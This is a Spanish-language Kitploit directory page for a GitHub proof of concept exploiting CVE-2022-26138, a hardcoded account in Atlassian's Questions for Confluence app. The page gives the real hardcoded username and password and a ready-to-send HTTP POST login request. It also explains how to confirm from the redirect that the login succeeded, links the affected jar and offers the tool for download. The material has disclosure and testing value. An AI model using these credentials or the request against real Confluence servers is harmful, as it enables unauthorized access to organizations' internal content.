Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-26138 — Contraseña codificada de Atlassian Questions (CVE-2022-26138) | Kitploit
Herramientas/GitHubGitHub/alcaparra/cve-2022-26138
Ataques de ContraseñasAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubalcaparra/cve-2022-26138

CVE-2022-26138

Contraseña codificada de Atlassian Questions (CVE-2022-26138)

Ver Repositorio
31109hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-26138 POC

questions_cve

Descripción

The Atlassian Questions For Confluence app for Confluence Server and Data Center 
creates a Confluence user account in the confluence-users group with 
the username disabledsystemuser and a hardcoded password. A remote, 
unauthenticated attacker with knowledge of the hardcoded password could
exploit this to log into Confluence and access all content accessible 
to users in the confluence-users group. 
This user account is created when installing versions 2.7.34, 2.7.35, and 3.0.2 of the app.

POC

Credenciales hardcodeadas:

  • Usuario: disabledsystemuser
  • Contraseña: disabled1system1user6708

Explotación

POST /dologin.action HTTP/1.1
Host: victim.local
Content-Type: application/x-www-form-urlencoded

os_username=disabledsystemuser&os_password=disabled1system1user6708&login=Log+in&os_destination=%2Fvulnerable.action

Si el servidor redirige a /vulnerable.action, las credenciales son válidas.

¿De dónde obtuviste las credenciales?

Las credenciales hardcodeadas estaban literalmente dentro de los archivos jar del complemento afectado

https://packages.atlassian.com/maven-atlassian-external/com/atlassian/confluence/plugins/confluence-questions/3.0.2/confluence-questions-3.0.2.jar

Referencias

  • https://www.cvedetails.com/cve/CVE-2022-26138/
  • https://confluence.atlassian.com/doc/confluence-security-advisory-2022-07-20-1142446709.html
  • https://jira.atlassian.com/browse/CONFSERVER-79483
Descargar herramienta